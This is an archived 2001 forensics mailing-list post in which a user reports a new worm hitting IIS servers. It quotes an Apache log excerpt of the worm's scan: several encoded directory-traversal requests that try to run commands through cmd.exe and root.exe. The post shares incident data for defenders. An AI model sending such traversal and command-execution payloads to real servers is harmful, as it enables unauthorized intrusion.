Check out http://slashdot.org/articles/01/09/18/151203.shtml for some more information... -P ----- Original Message ----- From: "Cory McIntire" <coryat_private> To: <forensicsat_private> Sent: Tuesday, September 18, 2001 10:43 AM Subject: New Worm ? > Hello, > I and a few others I know are getting bombard on our machines with IIS > requests....looks like another worm, and its much smarter than before, it > seems to stay within the same class A and sometimes the same class B as the > attacking machine is in. here is an excerpt of what i believe is the full > scan.... > > 204.120.69.195 - - [18/Sep/2001:09:35:12 -0500] "GET /MSADC/root.exe?/c+dir > HTTP/1.0" 404 - "-" "-" > 204.120.69.195 - - [18/Sep/2001:09:35:12 -0500] "GET > /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-" > 204.120.69.195 - - [18/Sep/2001:09:35:12 -0500] "GET > /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-" > 204.120.69.195 - - [18/Sep/2001:09:35:12 -0500] "GET > /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-" > 204.120.69.195 - - [18/Sep/2001:09:35:12 -0500] "GET > /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir > HTTP/1.0" 404 - "-" "-" > 204.120.69.195 - - [18/Sep/2001:09:35:12 -0500] "GET > /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir > HTTP/1.0" 404 - "-" "-" > 204.120.69.195 - - [18/Sep/2001:09:35:12 -0500] "GET > /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/sy stem32/cmd.exe?/c+dir > HTTP/1.0" 404 - "-" "-" > 204.120.69.195 - - [18/Sep/2001:09:35:14 -0500] "GET /scripts/root.exe?/c+dir > HTTP/1.0" 404 - "-" "-" > 204.120.69.195 - - [18/Sep/2001:09:35:16 -0500] "GET > /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-" > 204.120.69.195 - - [18/Sep/2001:09:35:16 -0500] "GET > /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-" > 204.120.69.195 - - [18/Sep/2001:09:35:19 -0500] "GET > /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-" > 204.120.69.195 - - [18/Sep/2001:09:35:19 -0500] "GET > /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-" > 204.120.69.195 - - [18/Sep/2001:09:35:19 -0500] "GET > /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-" > 204.120.69.195 - - [18/Sep/2001:09:35:22 -0500] "GET > /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-" > 204.120.69.195 - - [18/Sep/2001:09:35:23 -0500] "GET > /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-" > 204.120.69.195 - - [18/Sep/2001:09:35:23 -0500] "GET > /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-" > > just thought I would let you guys know...this one looks bad fella.....thank > god for apache.....that is of course, if there isnt a huge bog down on the > net....=[ > > cory > > ----------------------------------------------------------------- > This list is provided by the SecurityFocus ARIS analyzer service. > For more information on this free incident handling, management > and tracking system please see: http://aris.securityfocus.com > > ----------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Tue Sep 18 2001 - 09:30:41 PDT